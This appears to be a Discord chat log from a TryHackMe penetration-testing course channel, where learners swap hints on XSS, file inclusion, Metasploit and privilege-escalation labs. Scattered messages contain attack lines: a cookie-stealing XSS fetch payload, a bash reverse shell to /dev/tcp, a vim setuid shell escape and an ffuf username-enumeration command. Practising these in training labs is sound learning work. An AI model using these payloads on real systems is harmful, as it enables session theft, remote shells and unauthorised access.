close it )

what?

nvm didnt see it

mb

what task are you at? lemme check if i can help you

Cross Site Scripting Task 8

I restarted it earlier but I can try again

task 8 challenge

what shoould the url be?

Your directory is not correct

`/challenges/chall1 or 2

You are making a post request to the index page

Thanks after restarting it worked immediately

Gave +1 Rep to @steel nymph

Feel free to DM, if anyone having issues or need sanity check 🙂

Can't see where is the trouble, that worked fine for me tho, even tho i tried with IP + port on a nc listener

Didn't read this lul

Yes thanks maybe it's a little buggy

Glad it worked mate

File Inclusion Task 5 - Question 2. I cant seem to find the answer in the text.
It asks me what the function is causing the directory traversal in Lab #4 but I can only find the name ||"current directory trick"|| which it doesnt accepts.. can anyone help me in the right direction?

I already completed the lab but I dont know the exact name.

Thanks!

Gave +1 Rep to @steel nymph

Hi. May i know tryhackme use what timezone? Just want to know how many hour left before this event end. 27 / 8 right

The path doesn't go away, just the promotion.
It ends 27th October, midnight UTC/GMT

Alright thanks

So the promotion will end about 11 hr from now right

No.

Today is the 26th

Owh so its on 11.59 pm on 27

Midnight.

Hey, guys! Sorry if it is a dumb question, and especially if this isn't the room I should be asking in, but does this mean that globally the tickets are limited? Like for instance If I am trying to get a 3 month premium ticket, could it be that there are no more left?

That's not been updated, but yes the number of prizes is limited

Also #900054423588470854 for more info

Thank you! That kind of explains why I haven't been able to get anything that I need in those last 3 days 😅

It's also weighted for the lower value prizes, of course

That's to be expected, but I just wanted to know whether the limitation is a factor. However, I will keep trying until the event ends. It's an awesome path anyways, and I'm learning a lot from it! 😄

Hi I'm having a trouble with the Metasploit:Exploitation MSFVENOM part, i crafted a linux/x86/meterpreter/reverse_tcp elf and used multi/handler to listen, but every time i use the post /linux/gather/hashdump to collect hashes the exploit crashes and the post exploitation module doesn't work, any hint on what can be going wrong?

(Also tried with other post exploitation modules like shell_to_meterpreter and doesn't work either)

@wheat wigeon You are on the right track. What error message do you get. If any?

Well in the victim machine i get Segmentation fault (core dumped), and suddenly closes the connection to the atacker machine where i also get a message in the metasploit:
[!] SESSION may not be compatible with this module.
[] {VICTIM_IP} - Command shell session 1 closed.
[-] Post failed: NameError undefined local variable or method whoami' for #<Msf::Modules::Post__Linux__Gather__Hashdump::MetasploitModule:0x000055dd74616348> [-] Call stack: [-] /usr/share/metasploit-framework/lib/msf/core/post/linux/priv.rb:23:in is_root?'
[-] /usr/share/metasploit-framework/modules/post/linux/gather/hashdump.rb:25:in `run'
[] Post module execution commpleted

(I'm runing both machines as root)

When you run the .elf file you get that?

Nope

.elf file works fine

just the post exploitation module linux/gather/hashdump

after runing it, explodes closing the session

maybe has something to do with the architecture?

Are you having a meterpreter session or a normal shell session?

meterpreter

started listening with the exploit/multi/handler

but now that u mention i was never able to execute any command in that session either

If you are using the exploit/multi/handler, have you specified a payload for that listener?

sure both msfvenom and listener are shell_reverse_tcp

wait a second

But is the listener payload linux/x86/meterpreter/reverse_tcp ?

It has to be the exact same as the payload you used in msfvenom

yeah noticed it was slightly different

thats probably the issue

let me check

yeah

that was it

thank you, I didn't even realise it was slightly different if it wasnt bc of you

Gave +1 Rep to @shadow echo

ty

Not a problem 🙂

in Metasploit: Exploitation get fail from exploit on "Triggering free of corrupted buffer"

show options and post a screenshot please

That LHOST is not correct

The target can only talk to you via your VPN IP, so that's the IP you need

oh, i wrote set lhosts (

anyway it didnt help

same

its 64, no?

payload

Is that a THM Kali?

no, my vm

Then that IP is wrong for certain

10.10.x.x is for VMs deployed on THM including attackboxes and THM Kalis

yes, now it works
thanks)

I'm kinda a bit stuck and lost, trying to do a bit of research on this but I still don't think I'm grasping it. Working on File Inclusion and stuck on task 5. I'm trying to figure out what it's wanting and doing on the first question, but getting confused reading through everything in the task describes

try using
set LHOST tun0
as a network interface. I also tried to typing 10.10.x.x.

set LHOST tun0 --> twice

everything is ok now)
thanks

Gave +1 Rep to @ornate yarrow

good to hear.

sometimes setting SMBUser as guest if its open helps when eternalblue crashes

Has anyone been having issues with the Linux Priv Escalation tasks?

Oh, good point. Thanks for sharing.

Gave +1 Rep to @wheat wigeon

I have been attempting Task 6 (sudo) and Task 7 (SUID) rooms. When launching the machine, I will always get a connection error with the machine trying to restart every 15 seconds. I can ssh into the machine via my Attack Box. However, in task 6, I do not see a LD_PRELOAD variable and in task 7 I am not able to nano /etc/shadow. Am I doing something wrong?

Has any genius succesfully completed this course yet ?

Blue room wasn't that unstable though. But this room is maybe.

Is Blue room deliberately on stable you mean @ornate yarrow ?

On Linux right now. Last one is Win.

Np! Also another tip when trying to explode eternalblue OSCP likely, when using the zzz_exploit.py scanner you gotta change the SMBUser = "" to SMBUser = Guest if open otherwise it will sometimes show as not exploitable 😉

I think so. I tried that room 2 times when I started.

automated exploit is a bad practice. everyone should practice manual exploit 🙂

Thats super impressive that you peops are almost done! I am having an educational mental down as soo many good courses and promised myself not too touch another until I complete those already paid for. This course looks sooo juicy.

Agreed.

Anyone out there having trouble with Task 9 as well?
Cron Jobs aren't running...

https://tryhackme.com/room/linprivesc

try to make them execs

Yes I did. I also ran pspy64.

chmod +x {script_name}

wow

what a mistake

completed 30 seconds ago

I fell on that aswell don't worry about it xD

easy bro. where did you stuck?

btw can anyone help me with file inclusion?

dms?

sorry, selected wrong reply.

Thank you buddy. Now it's working!

Gave +1 Rep to @dusky saddle

Hello

Hi, I'm still stuck with the dll task of the Windows Privesc room, can I have some help plz? 🙂
I think I have the correct dll, I have stop/ start the dllsvc service. But I don't see the jack's account.. how am I supposed to login? @sterile crescent said yesterday with ||-credential ""||, but still I don't know how to do it.. ^^

yes

how? that what I don't get.

Hi, I stuck at Linux PrivEsc Task 9 privilege escalation with Cron Jobs. I stuck on reverse shell, I already edit the file backup.sh for reverse shell but it didnt work. I am not sure what I missed

hey i'm using the AttackBox.. that's what is going wrong you think?

Thank you. Oh my god what a mistake!

Gave +1 Rep to @steel nymph

Hello everyone. I am having a tough time getting through the task 5 of Linux PrivEsc from jr pentester.
I have download the exploit code for the vulnerability to the attackbox. its a .txt file which I have also transferred to the target machine using wget. but How do I run this .txt exploit file?? :/

well what language is the code inside

Anyone provide me with a hint in obtaining the hash of Frank's password in Task 6 (sudo)?

ah crap. I think i got the hint

Thanks @lusty bolt

Gave +1 Rep to @lusty bolt

Ah - I was able to finally able to get to Karen with the LD_Preload variable

But I did not elevate

Hi everyone , I have a problem with Authentication Bypass Task 2. FFUF does not give me any result.

Apologizes - I misspoke.

Does anyone know if we reset the rooms will we get different Tickets or the same ones?

Again no result . I save outputs to valid_usernames.txt file . "results: []" is empty.

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.116.231/customers/signup -mr "username already exists"

What other binary can be used through its capabilities?

https://tryhackme.com/room/linprivesc

task 8

what is it asking ?

I do that with -o valid_usernames.txt

okay so its a code written in c. downloaded the exploit to attackbox. Transferred the file to target machine via wget. moved it to a directory like /tmp. to run the code, used the command "./filename.c" but get permission denied

in Attackbox

use gcc

It creates the file , writes outputs and in that file I see , "results" :[]; it is empty . Other things are like "stop_errors" : false , "stop_403":false.

Thanks, I had tried that previously, but I guess I didn't format it right on that side.

Gave +1 Rep to @steel nymph

to compile it. right!

yes

I did both you say , but problem continued for me . I am going to try again , as you say...

Thanks again!

Gave +1 Rep to @lusty bolt

..

any one can help me with this ?

that's what i am asking, that what the question is saying i am unable to understand

Hey 👋 On task 8 File Inclusion, Gain RCE - Can I get execution via CURL or do I have to set up a listener and search for an exploit?

@cosmic quest Are you getting any results in your terminal windows without adding a > or -o option to your command?

File Inclusion was harder tbh

With an http.server for ex?

anyone here completed windows privilage esclation?

hey whats the exact time of end for give away on jr penetration testing path???

Thanks @steel nymph ! but I not able to connect via rdp neither..

Gave +1 Rep to @steel nymph

Did you connect from the VM with xrdp?

@steel nymph can i dm you?

Sorry for late reply , my problem has been solved now . I had to restart my PC and all rooms.

Thanks @steel nymph @modest arch

Gave +1 Rep to @steel nymph

Can anyone help me with this?

you forgot the period

to download in the current directory

??

you're calling scp correctly but you're not telling it where to download the file

oh no how do I add that

so it's hitting the dir, seeing there's data there, but you need to specify where to put it.
"scp pentester@<IP>:/home/pentester* ."

just redo the command and add a period

k

period is synonymous with <current directory>, you can specify different endpoints by replacing it.

so "scp pentester@<IP>:/home/pentester* ~/Downloads" would put it in your home Downloads folder without you having to actually cd into the dir

thanks @steel nymph

Gave +1 Rep to @steel nymph

Thanks @wanton jolt

Gave +1 Rep to @wanton jolt

🥳

Does someone know why I get in every room the same tickets?

Well, if it's all OSCP tickets it should be fine 🙂

Pentester title and 1 Day streak freeze 🥺

Well I would say it's bad luck :/

@steel nymph hi can you help my with something? on xss last part is not working with the decoded version and i dont know why

What is the value of the staff-session cookie?

tryed with echo and web base..

Can you please help me in this task I face a problem in this task.

echo then the encoded | base64 -d

same for both i think is something wrong

Thanks for your response. It's lots to me.

Gave +1 Rep to @steel nymph

</textarea><script>fetch('http://ip?cookie=' + btoa(document.cookie) );</script>

in linprivesc task 8, I try to run ||vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh/", "sh", "-c", "reset; exec sh")'||, but I get a permission denied error

isn't that command supposed to work?

SQL injection task 5, after this line my error should have been gone, what am i missing?

oh

thanks

Gave +1 Rep to @steel nymph

oh, now I get this error

@steel nymph

i dont understand

@steel nymphCan I DM you ?

so did you guys get tickets for each room you completed for this or just certain ones? I did most of these rooms prior to the path was created and only got tickets for the ones I didn't already complete

wait, I think I typed the command wrong

yeah, got it

Ah, dangerous thing with that method

echo adds a newline at the end

in FAQ its said that u can cancel ur progress and do it again for the sake of tickets

oh lol, screw the tickets then. I'm definitely not going through them all again

hahaha

tthanks @deft valley

welcome

i've been waiting two minutes now and I still haven't got the reverse shell from the crontab

in linprivesc

The command "sc stop ddlsvc & sc start ddlsvc" don't work for me.. it says "ControlService FAILED 1052". Do you have an idea why? (I'm still on Windwos Privesc..!)

what so just try ./script.sh

u can try task manager

then no I can't

permission denied

? hmm

is ur payload correct?

and check directory

I'm using ||bash -i >& /dev/tcp/tun0/7777 0>&1||

Thank you @steel nymph

Gave +1 Rep to @steel nymph

then check directory and as lassi said if its X

I tried to kill dllhijackservice through the task manager but I get access denied..

thanks

Gave +1 Rep to @deft valley

got it thanks

u can ||stop or start, my command with sc start/stop didnt work either, but i used task manager to start it||

anyone able to help with File Inclusion: Task 4, LFI step 1. When I input what I believe to be the answer it tells me it is wrong with error "Uh-oh! undefined" Not sure if I'm missing something here.

Do you use bitdefender?

What I thought and I tried it in two different browsers. Yes, is it catching the submission and blocking it?

Mhm

Whitelist our website and it should fix your issue:)

K what I was thinking. Ok sounds good.

TY

When I try to stop I get the error message "Unable to stop the service. // The requested control is not valid for this service"